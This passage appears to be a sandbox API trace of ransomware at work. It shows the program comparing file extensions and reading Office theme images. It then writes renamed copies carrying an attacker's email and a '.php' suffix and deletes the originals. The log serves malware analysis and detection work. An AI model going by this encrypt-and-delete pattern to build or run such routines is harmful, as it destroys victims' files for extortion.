"c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\preview.gif")) returned 1 [0046.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.399] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.399] lstrlenW (lpString=".doc") returned 4 [0046.399] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.399] lstrlenW (lpString=".docx") returned 5 [0046.399] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.399] lstrlenW (lpString=".pdf") returned 4 [0046.399] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.399] lstrlenW (lpString=".xls") returned 4 [0046.399] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.399] lstrlenW (lpString=".xlsx") returned 5 [0046.399] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.399] lstrlenW (lpString=".ppt") returned 4 [0046.399] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.400] lstrlenW (lpString=".zip") returned 4 [0046.400] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.400] lstrlenW (lpString=".rar") returned 4 [0046.400] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.400] lstrlenW (lpString=".bz2") returned 4 [0046.400] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.400] lstrlenW (lpString=".7z") returned 3 [0046.400] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.400] lstrlenW (lpString=".dbf") returned 4 [0046.400] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.400] lstrlenW (lpString=".1cd") returned 4 [0046.400] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.400] lstrlenW (lpString=".jpg") returned 4 [0046.400] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.400] lstrlenW (lpString=".doc") returned 4 [0046.400] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.400] lstrlenW (lpString=".docx") returned 5 [0046.400] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.400] lstrlenW (lpString=".pdf") returned 4 [0046.400] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.400] lstrlenW (lpString=".xls") returned 4 [0046.400] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.400] lstrlenW (lpString=".xlsx") returned 5 [0046.400] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.400] lstrlenW (lpString=".ppt") returned 4 [0046.400] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.400] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.400] lstrlenW (lpString=".zip") returned 4 [0046.401] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.401] lstrlenW (lpString=".rar") returned 4 [0046.401] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.401] lstrlenW (lpString=".bz2") returned 4 [0046.401] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.401] lstrlenW (lpString=".7z") returned 3 [0046.401] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.401] lstrlenW (lpString=".dbf") returned 4 [0046.401] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.401] lstrlenW (lpString=".1cd") returned 4 [0046.401] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.401] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\PREVIEW.GIF") returned 76 [0046.401] lstrlenW (lpString=".jpg") returned 4 [0046.401] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.401] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.401] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.401] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.402] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=31837) returned 1 [0046.402] CloseHandle (hObject=0x184) returned 1 [0046.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 0x20 [0046.402] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.402] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.402] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.402] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.402] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.402] GetLastError () returned 0x0 [0046.402] ReadFile (in: hFile=0x184, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x7c5d, lpOverlapped=0x0) returned 1 [0046.404] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x7c60, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x7c60, lpOverlapped=0x0) returned 1 [0046.405] ReadFile (in: hFile=0x184, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.406] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.406] SetEndOfFile (hFile=0x1b4) returned 1 [0046.406] CloseHandle (hObject=0x1b4) returned 1 [0046.406] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.406] SetEndOfFile (hFile=0x184) returned 1 [0046.407] CloseHandle (hObject=0x184) returned 1 [0046.407] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.407] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\boldstri\\thmbnail.png")) returned 1 [0046.407] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.407] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.407] lstrlenW (lpString=".doc") returned 4 [0046.407] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.407] lstrlenW (lpString=".docx") returned 5 [0046.408] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.408] lstrlenW (lpString=".pdf") returned 4 [0046.408] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.408] lstrlenW (lpString=".xls") returned 4 [0046.408] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.408] lstrlenW (lpString=".xlsx") returned 5 [0046.408] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.408] lstrlenW (lpString=".ppt") returned 4 [0046.408] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.408] lstrlenW (lpString=".zip") returned 4 [0046.408] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.408] lstrlenW (lpString=".rar") returned 4 [0046.408] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.408] lstrlenW (lpString=".bz2") returned 4 [0046.408] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.408] lstrlenW (lpString=".7z") returned 3 [0046.408] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.408] lstrlenW (lpString=".dbf") returned 4 [0046.408] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.408] lstrlenW (lpString=".1cd") returned 4 [0046.408] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.408] lstrlenW (lpString=".jpg") returned 4 [0046.408] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.408] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.408] lstrlenW (lpString=".doc") returned 4 [0046.408] lstrcmpiW (lpString1=".doc", lpString2=".PNG") returned -1 [0046.408] lstrlenW (lpString=".docx") returned 5 [0046.408] lstrcmpiW (lpString1=".docx", lpString2="L.PNG") returned -1 [0046.409] lstrlenW (lpString=".pdf") returned 4 [0046.409] lstrcmpiW (lpString1=".pdf", lpString2=".PNG") returned -1 [0046.409] lstrlenW (lpString=".xls") returned 4 [0046.409] lstrcmpiW (lpString1=".xls", lpString2=".PNG") returned 1 [0046.409] lstrlenW (lpString=".xlsx") returned 5 [0046.409] lstrcmpiW (lpString1=".xlsx", lpString2="L.PNG") returned -1 [0046.409] lstrlenW (lpString=".ppt") returned 4 [0046.409] lstrcmpiW (lpString1=".ppt", lpString2=".PNG") returned 1 [0046.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.409] lstrlenW (lpString=".zip") returned 4 [0046.409] lstrcmpiW (lpString1=".zip", lpString2=".PNG") returned 1 [0046.409] lstrlenW (lpString=".rar") returned 4 [0046.409] lstrcmpiW (lpString1=".rar", lpString2=".PNG") returned 1 [0046.409] lstrlenW (lpString=".bz2") returned 4 [0046.409] lstrcmpiW (lpString1=".bz2", lpString2=".PNG") returned -1 [0046.409] lstrlenW (lpString=".7z") returned 3 [0046.409] lstrcmpiW (lpString1=".7z", lpString2="PNG") returned -1 [0046.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.409] lstrlenW (lpString=".dbf") returned 4 [0046.409] lstrcmpiW (lpString1=".dbf", lpString2=".PNG") returned -1 [0046.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.409] lstrlenW (lpString=".1cd") returned 4 [0046.409] lstrcmpiW (lpString1=".1cd", lpString2=".PNG") returned -1 [0046.409] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BOLDSTRI\\THMBNAIL.PNG") returned 77 [0046.409] lstrlenW (lpString=".jpg") returned 4 [0046.409] lstrcmpiW (lpString1=".jpg", lpString2=".PNG") returned -1 [0046.409] lstrcmpiW (lpString1=".GIF", lpString2=".php") returned -1 [0046.409] lstrlenW (lpString="PREVIEW.GIF") returned 11 [0046.409] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.410] GetFileSizeEx (in: hFile=0x184, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=2722) returned 1 [0046.410] CloseHandle (hObject=0x184) returned 1 [0046.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 0x20 [0046.410] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.410] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x184 [0046.410] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.410] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.410] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b0 [0046.609] GetLastError () returned 0x0 [0046.609] ReadFile (in: hFile=0x184, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0xaa2, lpOverlapped=0x0) returned 1 [0046.612] WriteFile (in: hFile=0x1b0, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xab0, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xab0, lpOverlapped=0x0) returned 1 [0046.614] ReadFile (in: hFile=0x184, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.614] WriteFile (in: hFile=0x1b0, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xea, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xea, lpOverlapped=0x0) returned 1 [0046.614] SetEndOfFile (hFile=0x1b0) returned 1 [0046.614] CloseHandle (hObject=0x1b0) returned 1 [0046.614] SetFilePointerEx (in: hFile=0x184, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.614] SetEndOfFile (hFile=0x184) returned 1 [0046.615] CloseHandle (hObject=0x184) returned 1 [0046.615] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.616] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\breeze\\preview.gif")) returned 1 [0046.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.616] lstrlenW (lpString=".doc") returned 4 [0046.616] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.616] lstrlenW (lpString=".docx") returned 5 [0046.616] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.616] lstrlenW (lpString=".pdf") returned 4 [0046.616] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.616] lstrlenW (lpString=".xls") returned 4 [0046.616] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.616] lstrlenW (lpString=".xlsx") returned 5 [0046.616] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.616] lstrlenW (lpString=".ppt") returned 4 [0046.616] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.616] lstrlenW (lpString=".zip") returned 4 [0046.616] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.616] lstrlenW (lpString=".rar") returned 4 [0046.616] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.616] lstrlenW (lpString=".bz2") returned 4 [0046.616] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.616] lstrlenW (lpString=".7z") returned 3 [0046.616] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.616] lstrlenW (lpString=".dbf") returned 4 [0046.616] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.616] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.617] lstrlenW (lpString=".1cd") returned 4 [0046.617] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.617] lstrlenW (lpString=".jpg") returned 4 [0046.617] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.617] lstrlenW (lpString=".doc") returned 4 [0046.617] lstrcmpiW (lpString1=".doc", lpString2=".GIF") returned -1 [0046.617] lstrlenW (lpString=".docx") returned 5 [0046.617] lstrcmpiW (lpString1=".docx", lpString2="W.GIF") returned -1 [0046.617] lstrlenW (lpString=".pdf") returned 4 [0046.617] lstrcmpiW (lpString1=".pdf", lpString2=".GIF") returned 1 [0046.617] lstrlenW (lpString=".xls") returned 4 [0046.617] lstrcmpiW (lpString1=".xls", lpString2=".GIF") returned 1 [0046.617] lstrlenW (lpString=".xlsx") returned 5 [0046.617] lstrcmpiW (lpString1=".xlsx", lpString2="W.GIF") returned -1 [0046.617] lstrlenW (lpString=".ppt") returned 4 [0046.617] lstrcmpiW (lpString1=".ppt", lpString2=".GIF") returned 1 [0046.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.617] lstrlenW (lpString=".zip") returned 4 [0046.617] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0046.617] lstrlenW (lpString=".rar") returned 4 [0046.617] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0046.617] lstrlenW (lpString=".bz2") returned 4 [0046.617] lstrcmpiW (lpString1=".bz2", lpString2=".GIF") returned -1 [0046.617] lstrlenW (lpString=".7z") returned 3 [0046.617] lstrcmpiW (lpString1=".7z", lpString2="GIF") returned -1 [0046.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.617] lstrlenW (lpString=".dbf") returned 4 [0046.617] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0046.617] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.617] lstrlenW (lpString=".1cd") returned 4 [0046.617] lstrcmpiW (lpString1=".1cd", lpString2=".GIF") returned -1 [0046.618] lstrlenW (lpString="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\BREEZE\\PREVIEW.GIF") returned 74 [0046.618] lstrlenW (lpString=".jpg") returned 4 [0046.618] lstrcmpiW (lpString1=".jpg", lpString2=".GIF") returned 1 [0046.618] lstrcmpiW (lpString1=".PNG", lpString2=".php") returned 1 [0046.618] lstrlenW (lpString="THMBNAIL.PNG") returned 12 [0046.618] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.622] GetFileSizeEx (in: hFile=0x194, lpFileSize=0x342ff1c | out: lpFileSize=0x342ff1c*=32607) returned 1 [0046.622] CloseHandle (hObject=0x194) returned 1 [0046.622] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png")) returned 0x20 [0046.622] GetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php")) returned 0xffffffff [0046.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x194 [0046.622] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.622] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.622] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php" (normalized: "c:\\program files\\common files\\microsoft shared\\themes14\\canyon\\thmbnail.png.id-9c354b42.[back_me@foxmail.com].php"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x1b4 [0046.622] GetLastError () returned 0x0 [0046.622] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x7f5f, lpOverlapped=0x0) returned 1 [0046.624] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0x7f60, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0x7f60, lpOverlapped=0x0) returned 1 [0046.626] ReadFile (in: hFile=0x194, lpBuffer=0x3d60020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x342fed4, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesRead=0x342fed4*=0x0, lpOverlapped=0x0) returned 1 [0046.626] WriteFile (in: hFile=0x1b4, lpBuffer=0x3d60020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x342fc9c, lpOverlapped=0x0 | out: lpBuffer=0x3d60020*, lpNumberOfBytesWritten=0x342fc9c*=0xec, lpOverlapped=0x0) returned 1 [0046.626] SetEndOfFile (hFile=0x1b4) returned 1 [0046.626] CloseHandle (hObject=0x1b4) returned 1 [0046.626] SetFilePointerEx (in: hFile=0x194, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x342fec8 | out: lpNewFilePointer=0x0) returned 1 [0046.626] SetEndOfFile (hFile=0x194) returned 1 [0046.627] CloseHandle (hObject=0x194) returned 1 [0046.627] SetFileAttributesW (lpFileName="C:\\Program Files\\Common Files\\Microsoft Shared\\THEMES14\\CANYON\\THMBNAIL.PNG.id-9C354B42.[back_me@foxmail.com].php", dwFileAttributes=0x20) returned 1 [0046.628] DeleteFileW (lpFileName="C:\\Program Files\\Common Files\\Microsoft 